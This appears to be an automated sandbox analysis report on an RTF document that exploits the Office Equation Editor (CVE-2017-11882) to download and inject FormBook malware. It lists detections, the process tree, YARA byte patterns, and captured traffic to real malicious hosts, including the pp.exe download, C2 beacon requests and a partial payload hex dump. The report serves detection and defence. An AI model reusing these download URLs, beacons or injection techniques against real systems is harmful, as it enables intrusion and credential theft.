Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report fqwBU8MyzT.rtf

Overview

General Information

Sample Name:fqwBU8MyzT.rtf
Analysis ID:321301
MD5:b115f24fcecce5e8661300527a748448
SHA1:9673703628a2edf4fea0b3a764357f82b4c9ce9f
SHA256:15655af972b632964f3327334c8809fb6cd6cd04e43f4548a32a5bb5743a75bc
Tags:Formbookrtf

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1428 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2492 cmdline: 'C:\Users\Public\vbc.exe' MD5: BB30A5DD4130B071FB4CA5F005371C63)
      • RegSvcs.exe (PID: 2560 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
      • RegSvcs.exe (PID: 2520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2812 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2700 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x67128:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x673a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x93748:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x939c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x72ec5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x9f4e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x729b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x9efd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x72fc7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x9f5e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x7313f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9f75f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x67dba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x943da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x71c2c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9e24c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x68ab3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x950d3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x78b67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xa5187:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x79b6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.RegSvcs.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.RegSvcs.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.RegSvcs.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        6.2.RegSvcs.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.RegSvcs.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.207.38.170, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1428, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1428, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: fqwBU8MyzT.rtfAvira: detected
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeReversingLabs: Detection: 35%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 35%
          Multi AV Scanner detection for submitted fileShow sources
          Source: fqwBU8MyzT.rtfReversingLabs: Detection: 48%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 6.2.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: global trafficDNS query: name: www.auctionpros.club
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.207.38.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.207.38.170:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 19:04:32 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 19 Nov 2020 08:07:19 GMTETag: "ada00-5b471378e0ce7"Accept-Ranges: bytesContent-Length: 711168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 27 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 ba 0a 00 00 1e 00 00 00 00 00 00 6e d9 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c d9 0a 00 4f 00 00 00 00 e0 0a 00 20 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 b9 0a 00 00 20 00 00 00 ba 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 1a 00 00 00 e0 0a 00 00 1c 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 d8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 d9 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 50 e8 08 00 cc f0 01 00 03 00 00 00 02 00 00 06 c8 cd 01 00 88 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 1b 30 04 00 1f 00 00 00 01 00 00 11 00 00 28 1e 00 00 0a 28 05 00 00 06 00 de 02 00 dc 00 28 0b 00 00 06 02 28 06 00 00 06 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 13 30 04 00 ad 00 00 00 01 00 00 11 00 02 16 28 1f 00 00 0a 20 b0 cb 8b 1b 20 39 39 48 0e 61 25 0a 1d 5e 45 07 00 00 00 d0 ff ff ff 41 00 00 00 12 00 00 00 74 00 00 00 02 00 00 00 5b 00 00 00 29 00 00 00 2b 72 00 06 20 6b 78 5c 52 5a 20 46 88 3c 91 61 2b c3 02 17 28 07 00 00 06 00 06 20 8d ca c1 ee 5a 20 4a a6 e5 72 61 2b ac 00 02 17 28 20 00 00 0a 00 06 20 79 ff 5a 07 5a 20 59 e0 ad 40 61 2b 94 02 16 28 21 00 00 0a 00 06 20 c0 ad 34 ae 5a 20 ab a0 33 85 61 38 7a ff ff ff 02 16 28 22 00 00 0a 06 20 e1 cb c2 91 5a 20 c8 13 e9 49 61 38 61 ff ff ff 2a 00 00 00 13 30 04 00 44 00 00 00 01 00 00 11 00 20 66 37 11 69 20 59 84 7e 07 61 25 0a 19 5e 45 03 00 00
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1Host: www.sgbanfang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
          Source: global trafficHTTP traffic detected: GET /pp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.207.38.170Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD501063-4E04-4856-9DA8-291722E1F767}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /pp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.207.38.170Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1Host: www.sgbanfang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.auctionpros.club
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:06:00 GMTServer: ApacheAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/htmlConnection: closeData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 